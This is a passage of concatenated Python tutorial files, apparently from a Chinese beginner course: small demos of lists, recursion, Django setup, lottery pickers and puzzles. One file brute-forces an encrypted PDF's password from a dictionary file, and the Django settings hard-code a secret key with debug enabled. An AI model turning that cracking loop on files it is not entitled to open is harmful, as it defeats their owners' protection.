退出查找') choice = int(input('请输入: ')) if choice == 1: find_all_contacters(con) elif choice == 2: find_contacters_by_name(con) elif choice == 3: break def main(): con = pymysql.connect(host='1.2.3.4', port=3306, user='yourname', passwd='yourpass', db='address', charset='utf8', autocommit=True, cursorclass=pymysql.cursors.DictCursor) while True: print('=====通讯录=====') print('1. 新建联系人') print('2. 查找联系人') print('3. 退出系统') print('===============') choice = int(input('请选择: ')) if choice == 1: add_new_contacter(con) elif choice == 2: find_contacters(con) elif choice == 3: con.close() print('谢谢使用, 再见!') break if __name__ == '__main__': main() File: Day46-60/code/hellodjango/manage.py #!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'hellodjango.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main() File: Day46-60/code/hellodjango/first/models.py from django.db import models # Create your models here. File: Day46-60/code/hellodjango/first/__init__.py File: Day46-60/code/hellodjango/first/apps.py from django.apps import AppConfig class FirstConfig(AppConfig): name = 'first' File: Day46-60/code/hellodjango/first/admin.py from django.contrib import admin # Register your models here. File: Day46-60/code/hellodjango/first/tests.py from django.test import TestCase # Create your tests here. File: Day46-60/code/hellodjango/first/views.py from random import sample from django.shortcuts import render def show_index(request): fruits = [ 'Apple', 'Orange', 'Pitaya', 'Durian', 'Waxberry', 'Blueberry', 'Grape', 'Peach', 'Pear', 'Banana', 'Watermelon', 'Mango' ] return render(request, 'index.html', {'fruits': sample(fruits, 3)}) File: Day46-60/code/hellodjango/first/migrations/__init__.py File: Day46-60/code/hellodjango/hellodjango/__init__.py File: Day46-60/code/hellodjango/hellodjango/settings.py """ Django settings for hellodjango project. Generated by 'django-admin startproject' using Django 2.2.13. For more information on this file, see https://docs.djangoproject.com/en/2.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.2/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'x)q$(0m0^ttqii@^zn^9bdbh&%l$)wzjm=nv&_y+^y9e!37=-z' # SECURITY WARNING: don't run with debug turned on in production! 
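# A hedged aside (not part of the generated settings): in a real deployment
# DEBUG would normally be driven by the environment and ALLOWED_HOSTS would
# list the domains actually being served, for example:
#     DEBUG = os.environ.get('DJANGO_DEBUG', '') == 'true'
#     ALLOWED_HOSTS = ['www.example.com']
# The development defaults below are left unchanged.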
DEBUG = True

ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'hellodjango.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'hellodjango.wsgi.application'


# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/

STATIC_URL = '/static/'

File: Day46-60/code/hellodjango/hellodjango/urls.py

"""hellodjango URL Configuration

The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
    1. Add an import:  from my_app import views
    2. Add a URL to urlpatterns:  path('', views.home, name='home')
Class-based views
    1. Add an import:  from other_app.views import Home
    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')
Including another URLconf
    1. Import the include() function: from django.urls import include, path
    2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path

from first.views import show_index

urlpatterns = [
    path('admin/', admin.site.urls),
    path('hello/', show_index),
]

File: Day46-60/code/hellodjango/hellodjango/wsgi.py

"""
WSGI config for hellodjango project.

It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os

from django.core.wsgi import get_wsgi_application

os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'hellodjango.settings')

application = get_wsgi_application()

File: 番外篇/code/test03.py

from random import randint, sample

# Initialize the candidate red balls (1-33)
red_balls = [x for x in range(1, 34)]
# Pick six red balls
selected_balls = sample(red_balls, 6)
# Sort the red balls
selected_balls.sort()
# Add one blue ball (1-16)
selected_balls.append(randint(1, 16))
# Print the selected numbers
for index, ball in enumerate(selected_balls):
    print('%02d' % ball, end=' ')
    if index == len(selected_balls) - 2:
        print('|', end=' ')
print()

File: 番外篇/code/test02.py

print(sum(range(1, 101)))

File: 番外篇/code/test.py

def merge(items1, items2):
    """Merge two sorted lists into a single sorted list."""
    items3 = []
    index1, index2 = 0, 0
    while index1 < len(items1) and index2 < len(items2):
        if items1[index1] < items2[index2]:
            items3.append(items1[index1])
            index1 += 1
        else:
            items3.append(items2[index2])
            index2 += 1
    # Copy whatever is left over in either list
    items3 += items1[index1:]
    items3 += items2[index2:]
    return items3

File: 番外篇/code/test01.py

print('hello, world!')

File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example03.py

a, b = 0, 1
for num in range(1, 101):
    a, b = b, a + b
    print(f'{num}: {a}')

File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example02.py

nums = []
for i in range(100000):
    nums.insert(0, i)
print(nums)

File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example06.py

import re
import PyPDF2

with open('Python_Tricks_encrypted.pdf', 'rb') as pdf_file_stream:
    reader = PyPDF2.PdfFileReader(pdf_file_stream)
    with open('dictionary.txt', 'r') as txt_file_stream:
        file_iter = iter(lambda: txt_file_stream.readline(), '')
        for word in file_iter:
            word = re.sub(r'\s', '', word)
            if reader.decrypt(word):
                print(word)
                break

File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example01.py

nums = []
for i in range(100000):
    nums.append(i)
nums.reverse()
print(nums)

File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example05.py

"""
A rooster costs 5 yuan, a hen costs 3 yuan, and chicks are 3 for 1 yuan. With 100 yuan, buy exactly 100 chickens. How many roosters, hens, and chicks are there?
""" for x in range(21): for y in range(34): z = 100 - x - y if z % 3 == 0 and 5 * x + 3 * y + z // 3 == 100: print(x, y, z) File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example04.py from functools import lru_cache @lru_cache() def fib(num): if num in (1, 2): return 1 return fib(num - 1) + fib(num - 2) for num in range(1, 101): print(f'{num}: {fib(num)}') File: 公开课/文档/第04次公开课-好玩的Python/code/example01.py from PIL import Image, ImageFilter chiling = Image.open('resources/chiling.jpg') width, height = chiling.size chiling.show() chiling.transpose(Image.FLIP_LEFT_RIGHT).show() chiling.filter(ImageFilter.GaussianBlur(4)).show() chiling.filter(ImageFilter.EMBOSS).show() chiling.thumbnail((width // 4, height // 4)) chiling.show() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example09.py import copy class PrototypeMeta(type): def __init__(cls, *args, **kwargs): super().__init__(*args, **kwargs) cls.clone = lambda self, is_deep=True: \ copy.deepcopy(self) if is_deep else copy.copy(self) class Student(metaclass=PrototypeMeta): pass stu1 = Student() stu2 = stu1.clone() print(stu1 == stu2) print(id(stu1), id(stu2)) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example08.py from functools import wraps from threading import RLock def singleton(cls): instances = {} lock = RLock() @wraps(cls) def wrapper(*args, **kwargs): if cls not in instances: with lock: if cls not in instances: instances[cls] = cls(*args, **kwargs) return instances[cls] @singleton class President: pass President = President.__wrapped__ File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example07.py from functools import lru_cache @lru_cache() def fib(num): if num in (1, 2): return 1 return fib(num - 1) + fib(num - 2) for n in range(1, 121): print(f'{n}: {fib(n)}') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example03.py values = [True] * 10 print(values) numbers = [x for x in range(1, 11)] print(numbers) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example02.py print(sum(range(1, 101))) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example06.py # 一行代码实现求阶乘函数 fac = lambda x: __import__('functools').reduce(int.__mul__, range(1, x + 1), 1) print(fac(5)) # 一行代码实现求最大公约数函数 gcd = lambda x, y: y % x and gcd(y % x, x) or x print(gcd(15, 27)) # 一行代码实现判断素数的函数 is_prime = lambda x: x > 1 and not [f for f in range(2, int(x ** 0.5) + 1) if x % f == 0] for num in range(2, 100): if is_prime(num): print(num, end=' ') print() # 一行代码实现快速排序 quick_sort = lambda items: len(items) and quick_sort([x for x in items[1:] if x < items[0]]) \ + [items[0]] + quick_sort([x for x in items[1:] if x > items[0]]) \ or items items = [57, 12, 35, 68, 99, 81, 70, 22] print(quick_sort(items)) # 生成FizzBuzz列表 # 1 2 Fizz 4 Buzz 6 ... 14 ... FizzBuzz 16 ... 
100 print(['Fizz'[x % 3 * 4:] + 'Buzz'[x % 5 * 4:] or x for x in range(1, 101)]) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example01.py print('hello, world') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example05.py from http.server import HTTPServer, SimpleHTTPRequestHandler class RequestHandler(SimpleHTTPRequestHandler): def do_GET(self): self.send_response(200) self.end_headers() self.wfile.write('<h1>goodbye, world</h1>'.encode()) server = HTTPServer(('', 8000), RequestHandler) server.serve_forever() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example04.py from random import randint, sample def generate(): """生成一组随机号码""" red_balls = [x for x in range(1, 34)] selected_balls = sample(red_balls, 6) selected_balls.sort() selected_balls.append(randint(1, 16)) return selected_balls def display(balls): """输出一组双色球号码""" for index, ball in enumerate(balls): print(f'{ball:0>2d}', end=' ') if index == len(balls) - 2: print('|', end=' ') print() num = int(input('机选几注: ')) for _ in range(num): display(generate()) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example10.py import random import time import requests from bs4 import BeautifulSoup for page in range(10): resp = requests.get( url=f'https://movie.douban.com/top250?start={25 * page}', headers={'User-Agent': 'BaiduSpider'} ) soup = BeautifulSoup(resp.text, "lxml") for elem in soup.select('a > span.title:nth-child(1)'): print(elem.text) time.sleep(random.random() * 5) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom04.py fruits = ['orange', 'grape', 'pitaya', 'blueberry'] # index = 0 # for fruit in fruits: # print(index, ':', fruit) # index += 1 for index, fruit in enumerate(fruits): print(index, ':', fruit) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom05.py data = [7, 20, 3, 15, 11] # result = [] # for i in data: # if i > 10: # result.append(i * 3) result = [num * 3 for num in data if num > 10] print(result) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom01.py name = 'jackfrued' fruits = ['apple', 'orange', 'grape'] owners = {'name': '骆昊', 'age': 40, 'gender': True} # if name != '' and len(fruits) > 0 and len(owners.keys()) > 0: # print('Jackfrued love fruits.') if name and fruits and owners: print('Jackfrued love fruits.') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom06.py data = {'x': '5'} # if 'x' in data and isinstance(data['x'], (str, int, float)) \ # and data['x'].isdigit(): # value = int(data['x']) # print(value) # else: # value = None try: value = int(data['x']) print(value) except (KeyError, TypeError, ValueError): value = None File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom02.py a, b = 5, 10 # temp = a # a = b # b = a a, b = b, a print(f'a = {a}, b = {b}') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom03.py chars = ['j', 'a', 'c', 'k', 'f', 'r', 'u', 'e', 'd'] # name = '' # for char in chars: # name += char name = ''.join(chars) print(name) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part04/example.py import cProfile # @profile def is_prime(num): for factor in range(2, int(num ** 0.5) + 1): if num % factor == 0: return False return True class PrimeIter: def __init__(self, total): self.counter = 0 self.current = 1 self.total = total def __iter__(self): return self def __next__(self): if self.counter < self.total: self.current += 1 while not is_prime(self.current): self.current += 1 self.counter += 1 
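        # Descriptive note: `self.current` has just been advanced to the next
        # prime and the running count of produced primes updated; the value is
        # returned below. Once `total` primes have been produced, StopIteration
        # is raised, which is how for-loops and list() know the iterator is
        # exhausted.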
return self.current raise StopIteration() @profile def eat_memory(): items = [] for _ in range(1000000): items.append(object()) return items def main(): eat_memory() # list(PrimeIter(1000)) # cProfile.run('list(PrimeIter(10000))') if __name__ == '__main__': main() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part03/example.py """ 扑克 """ import enum import random @enum.unique class Suite(enum.Enum): """花色(枚举)""" SPADE, HEART, CLUB, DIAMOND = range(4) class Card: """牌""" def __init__(self, suite, face): self.suite = suite self.face = face def __repr__(self): suites = '♠♥♣♦' faces = ['', 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K'] return f'{suites[self.suite.value]}{faces[self.face]}' class Poker: """扑克""" def __init__(self): self.cards = [Card(suite, face) for suite in Suite for face in range(1, 14)] self.current = 0 def shuffle(self): """洗牌""" self.current = 0 random.shuffle(self.cards) def deal(self): """发牌""" card = self.cards[self.current] self.current += 1 return card @property def has_next(self): """还有没有牌可以发""" return self.current < len(self.cards) def main(): """主函数(程序入口)""" poker = Poker() poker.shuffle() print(poker.cards) if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example03.py """ 迷宫寻路 """ import random import sys WALL = -1 ROAD = 0 ROWS = 10 COLS = 10 def find_way(maze, i=0, j=0, step=1): """走迷宫""" if 0 <= i < ROWS and 0 <= j < COLS and maze[i][j] == 0: maze[i][j] = step if i == ROWS - 1 and j == COLS - 1: print('=' * 20) display(maze) sys.exit(0) find_way(maze, i + 1, j, step + 1) find_way(maze, i, j + 1, step + 1) find_way(maze, i - 1, j, step + 1) find_way(maze, i, j - 1, step + 1) maze[i][j] = ROAD def reset(maze): """重置迷宫""" for i in range(ROWS): for j in range(COLS): num = random.randint(1, 10) maze[i][j] = WALL if num > 7 else ROAD maze[0][0] = maze[ROWS - 1][COLS - 1] = ROAD def display(maze): """显示迷宫""" for row in maze: for col in row: if col == -1: print('■', end=' ') elif col == 0: print('□', end=' ') else: print(f'{col}'.ljust(2), end='') print() def main(): """主函数""" maze = [[0] * COLS for _ in range(ROWS)] reset(maze) display(maze) find_way(maze) print('没有出路!!!') if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example02.py def climb(num): a, b, c = 1, 2, 4 for _ in range(num - 1): a, b, c = b, c, a + b + c return a def main(): n = int(input('台阶数量: ')) print(climb(n)) if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example01.py import sys def fac(num): if num == 0: return 1 return num * fac(num - 1) def main(): print(fac(59996)) if __name__ == '__main__': sys.setrecursionlimit(60000) main() # for i in range(1000): # print(f'{i}:'.rjust(3), fac(i)) File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example05.py size = 25 for i in range(size): for j in range(size): if i % 2 == 1 or j % 2 == 1: print('■', end='') else: print('□', end='') print() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example04.py """ 骑士巡逻 """ import sys SIZE = 8 def display(board): """显示棋盘""" for row in board: for col in row: print(f'{col}'.rjust(2, '0'), end=' ') print() def patrol(board, i=0, j=0, step=1): """巡逻""" if 0 <= i < SIZE and 0 <= j < SIZE and board[i][j] == 0: board[i][j] = step if step == SIZE * SIZE: display(board) sys.exit(0) patrol(board, i + 1, j + 2, step + 1) patrol(board, i + 2, j + 1, step + 1) patrol(board, i + 2, j - 1, step + 1) patrol(board, i + 1, j - 2, step + 1) patrol(board, i - 1, j - 2, step + 1) patrol(board, i - 2, j - 1, step + 1) patrol(board, i - 2, j + 1, step + 1) 
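        # The recursive calls above and below try all eight knight moves from
        # square (i, j); if none of them leads to a complete tour, board[i][j]
        # is reset to 0 afterwards so the square can be revisited on another
        # path (classic backtracking).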
patrol(board, i - 1, j + 2, step + 1) board[i][j] = 0 def main(): """主函数""" board = [[0] * SIZE for _ in range(SIZE)] patrol(board) if __name__ == '__main__': main() File: Day01-15/code/Day07/lottery.py """ 双色球随机选号程序 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ from random import randrange, randint, sample def display(balls): """ 输出列表中的双色球号码 """ for index, ball in enumerate(balls): if index == len(balls) - 1: print('|', end=' ') print('%02d' % ball, end=' ') print() def random_select(): """ 随机选择一组号码 """ red_balls = [x for x in range(1, 34)] selected_balls = [] for _ in range(6): index = randrange(len(red_balls)) selected_balls.append(red_balls[index]) del red_balls[index] # 上面的for循环也可以写成下面这行代码 # sample函数是random模块下的函数 # selected_balls = sample(red_balls, 6) selected_balls.sort() selected_balls.append(randint(1, 16)) return selected_balls def main(): n = int(input('机选几注: ')) for _ in range(n): display(random_select()) if __name__ == '__main__': main() File: Day01-15/code/Day07/marquee.py """ 输入学生考试成绩计算平均分 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ import os import time def main(): str = 'Welcome to 1000 Phone Chengdu Campus ' while True: print(str) time.sleep(0.2) str = str[1:] + str[0:1] # for Windows use os.system('cls') instead os.system('clear') if __name__ == '__main__': main() File: Day01-15/code/Day07/tuple.py """ 元组的定义和使用 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): # 定义元组 t = ('骆昊', 38, True, '四川成都') print(t) # 获取元组中的元素 print(t[0]) print(t[1]) print(t[2]) print(t[3]) # 遍历元组中的值 for member in t: print(member) # 重新给元组赋值 # t[0] = '王大锤' # TypeError # 变量t重新引用了新的元组 原来的元组被垃圾回收 t = ('王大锤', 20, True, '云南昆明') print(t) # 元组和列表的转换 person = list(t) print(person) person[0] = '李小龙' person[1] = 25 print(person) fruits_list = ['apple', 'banana', 'orange'] fruits_tuple = tuple(fruits_list) print(fruits_tuple) print(fruits_tuple[1]) if __name__ == '__main__': main() File: Day01-15/code/Day07/list3.py """ 生成列表 - 用range创建数字列表 - 生成表达式 - 生成器 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ # 生成Fibonacci序列的生成器 def fib(n): a, b = 0, 1 for _ in range(n): a, b = b, a + b yield a def main(): # 用range创建数值列表 list1 = list(range(1, 11)) print(list1) # 生成表达式 list2 = [x * x for x in range(1, 11)] print(list2) list3 = [m + n for m in 'ABCDEFG' for n in '12345'] print(list3) print(len(list3)) # 生成器(节省空间但生成下一个元素时需要花费时间) gen = (m + n for m in 'ABCDEFG' for n in '12345') print(gen) for elem in gen: print(elem, end=' ') print() gen = fib(20) print(gen) for elem in gen: print(elem, end=' ') print() if __name__ == '__main__': main() File: Day01-15/code/Day07/tic-tac-toe.py """ 井字棋游戏 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ import os def print_board(board): print(board['TL'] + '|' + board['TM'] + '|' + board['TR']) print('-+-+-') print(board['ML'] + '|' + board['MM'] + '|' + board['MR']) print('-+-+-') print(board['BL'] + '|' + board['BM'] + '|' + board['BR']) def main(): init_board = { 'TL': ' ', 'TM': ' ', 'TR': ' ', 'ML': ' ', 'MM': ' ', 'MR': ' ', 'BL': ' ', 'BM': ' ', 'BR': ' ' } begin = True while begin: curr_board = init_board.copy() begin = False turn = 'x' counter = 0 os.system('clear') print_board(curr_board) while counter < 9: move = input('轮到%s走棋, 请输入位置: ' % turn) if curr_board[move] == ' ': counter += 1 curr_board[move] = turn if turn == 'x': turn = 'o' else: turn = 'x' os.system('clear') print_board(curr_board) choice = input('再玩一局?(yes|no)') begin = choice == 'yes' if __name__ == '__main__': main() File: Day01-15/code/Day07/avgscore.py """ 输入学生考试成绩计算平均分 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ 
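# A minimal alternative sketch (this helper is not in the original file): once
# the scores are collected, the same average can be computed with the built-in
# sum() and len() instead of the explicit accumulation loop in main() below.
def average(scores):
    """Return the arithmetic mean of a non-empty list of scores."""
    return sum(scores) / len(scores)


# Hypothetical usage: average([90.0, 80.5, 70.0]) == 80.16666666666667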
def main(): number = int(input('请输入学生人数: ')) names = [None] * number scores = [None] * number for index in range(len(names)): names[index] = input('请输入第%d个学生的名字: ' % (index + 1)) scores[index] = float(input('请输入第%d个学生的成绩: ' % (index + 1))) total = 0 for index in range(len(names)): print('%s: %.1f分' % (names[index], scores[index])) total += scores[index] print('平均成绩是: %.1f分' % (total / number)) if __name__ == '__main__': main() File: Day01-15/code/Day07/dict1.py """ 定义和使用字典 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): scores = {'骆昊': 95, '白元芳': 78, '狄仁杰': 82} print(scores['骆昊']) print(scores['狄仁杰']) for elem in scores: print('%s\t--->\t%d' % (elem, scores[elem])) scores['白元芳'] = 65 scores['诸葛王朗'] = 71 scores.update(冷面=67, 方启鹤=85) print(scores) if '武则天' in scores: print(scores['武则天']) print(scores.get('武则天')) print(scores.get('武则天', 60)) print(scores.popitem()) print(scores.popitem()) print(scores.pop('骆昊', 100)) scores.clear() print(scores) if __name__ == '__main__': main() File: Day01-15/code/Day07/set1.py """ 定义和使用集合 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): set1 = {1, 2, 3, 3, 3, 2} print(set1) print('Length =', len(set1)) set2 = set(range(1, 10)) print(set2) set1.add(4) set1.add(5) set2.update([11, 12]) print(set1) print(set2) set2.discard(5) # remove的元素如果不存在会引发KeyError if 4 in set2: set2.remove(4) print(set2) # 遍历集合容器 for elem in set2: print(elem ** 2, end=' ') print() # 将元组转换成集合 set3 = set((1, 2, 3, 3, 2, 1)) print(set3.pop()) print(set3) if __name__ == '__main__': main() File: Day01-15/code/Day07/list2.py """ 列表常用操作 - 列表连接 - 获取长度 - 遍历列表 - 列表切片 - 列表排序 - 列表反转 - 查找元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', 'apple', 'strawberry', 'waxberry'] fruits += ['pitaya', 'pear', 'mango'] # 循环遍历列表元素 for fruit in fruits: print(fruit.title(), end=' ') print() # 列表切片 fruits2 = fruits[1:4] print(fruits2) # fruit3 = fruits # 没有复制列表只创建了新的引用 fruits3 = fruits[:] print(fruits3) fruits4 = fruits[-3:-1] print(fruits4) fruits5 = fruits[::-1] print(fruits5) if __name__ == '__main__': main() File: Day01-15/code/Day07/set2.py """ 集合的常用操作 - 交集 - 并集 - 差集 - 子集 - 超集 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): set1 = set(range(1, 7)) print(set1) set2 = set(range(2, 11, 2)) print(set2) set3 = set(range(1, 5)) print(set1 & set2) # print(set1.intersection(set2)) print(set1 | set2) # print(set1.union(set2)) print(set1 - set2) # print(set1.difference(set2)) print(set1 ^ set2) # print(set1.symmetric_difference(set2)) print(set2 <= set1) # print(set2.issubset(set1)) print(set3 <= set1) # print(set3.issubset(set1)) print(set1 >= set2) # print(set1.issuperset(set2)) print(set1 >= set3) # print(set1.issuperset(set3)) if __name__ == '__main__': main() File: Day01-15/code/Day07/findmax.py """ 找出列表中最大或最小的元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', 'apple', 'strawberry', 'waxberry', 'pitaya'] # 直接使用内置的max和min函数找出列表中最大和最小元素 # print(max(fruits)) # print(min(fruits)) max_value = min_value = fruits[0] for index in range(1, len(fruits)): if fruits[index] > max_value: max_value = fruits[index] elif fruits[index] < min_value: min_value = fruits[index] print('Max:', max_value) print('Min:', min_value) if __name__ == '__main__': main() # 想一想如果最大的元素有两个要找出第二大的又该怎么做 File: Day01-15/code/Day07/list1.py """ 定义和使用列表 - 用下标访问元素 - 添加元素 - 删除元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', '@pple', 'strawberry', 'waxberry'] print(fruits) # 通过下标访问元素 print(fruits[0]) print(fruits[1]) print(fruits[-1]) 
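    # Negative indexes count from the end of the list: -1 is the last element
    # and -2 the one before it; indexing past either end raises IndexError, as
    # the commented-out lines below show.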
print(fruits[-2]) # print(fruits[-5]) # IndexError # print(fruits[4]) # IndexError fruits[1] = 'apple' print(fruits) # 添加元素 fruits.append('pitaya') fruits.insert(0, 'banana') print(fruits) # 删除元素 del fruits[1] fruits.pop() fruits.pop(0) fruits.remove('apple') print(fruits) if __name__ == '__main__': main() File: Day01-15/code/Day07/dict2.py """ 字典的常用操作 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): stu = {'name': '骆昊', 'age': 38, 'gender': True} print(stu) print(stu.keys()) print(stu.values()) print(stu.items()) for elem in stu.items(): print(elem) print(elem[0], elem[1]) if 'age' in stu: stu['age'] = 20 print(stu) stu.setdefault('score', 60) print(stu) stu.setdefault('score', 100) print(stu) stu['score'] = 100 print(stu) if __name__ == '__main__': main() File: Day01-15/code/Day07/yanghui.py """ 输出10行的杨辉三角 - 二项式的n次方展开系数 1 1 1 1 2 1 1 3 3 1 1 4 6 4 1 ... ... ... Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): num = int(input('Number of rows: ')) yh = [[]] * num for row in range(len(yh)): yh[row] = [None] * (row + 1) for col in range(len(yh[row])): if col == 0 or col == row: yh[row][col] = 1 else: yh[row][col] = yh[row - 1][col] + yh[row - 1][col - 1] print(yh[row][col], end='\t') print() if __name__ == '__main__': main() File: Day01-15/code/Day07/fibonacci.py """ 生成斐波拉切数列 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): f = [1 , 1] for i in range(2, 20): f += [f[i - 1] + f[i - 2]] # f.append(f[i - 1] + f[i - 2]) for val in f: print(val, end=' ') if __name__ == '__main__': main() File: Day01-15/code/Day07/scoretable.py """ 学生考试成绩表 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): names = ['关羽', '张飞', '赵云', '马超', '黄忠'] subjs = ['语文', '数学', '英语'] scores = [[0] * 3] * 5 for row, name in enumerate(names): print('请输入%s的成绩' % name) for col, subj in enumerate(subjs): scores[row][col] = float(input(subj + ': ')) print(scores) # for row, name in enumerate(names): # print('请输入%s的成绩' % name) # scores[row] = [None] * len(subjs) # for col, subj in enumerate(subjs): # score = float(input(subj + ': ')) # scores[row][col] = score # print(scores) if __name__ == '__main__': main() File: Day01-15/code/Day09/rational.py """ 运算符重载 - 自定义分数类 Version: 0.1 Author: 骆昊 Date: 2018-03-12 """ from math import gcd class Rational(object): def __init__(self, num, den=1): if den == 0: raise ValueError('分母不能为0') self._num = num self._den = den self.normalize() def simplify(self): x = abs(self._num) y = abs(self._den) factor = gcd(x, y) if factor > 1: self._num //= factor self._den //= factor return self def normalize(self): if self._den < 0: self._den = -self._den self._num = -self._num return self def __add__(self, other): new_num = self._num * other._den + other._num * self._den new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __sub__(self, other): new_num = self._num * other._den - other._num * self._den new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __mul__(self, other): new_num = self._num * other._num new_den = self._den * other._den return Rational(new_num, new_den).simplify().normalize() def __truediv__(self, other): new_num = self._num * other._den new_den = self._den * other._num return Rational(new_num, new_den).simplify().normalize() def __str__(self): if self._num == 0: return '0' elif self._den == 1: return str(self._num) else: return '(%d/%d)' % (self._num, self._den) if __name__ == '__main__': r1 = Rational(2, 3) print(r1) r2 = Rational(6, -8) print(r2) print(r2.simplify()) print('%s + 
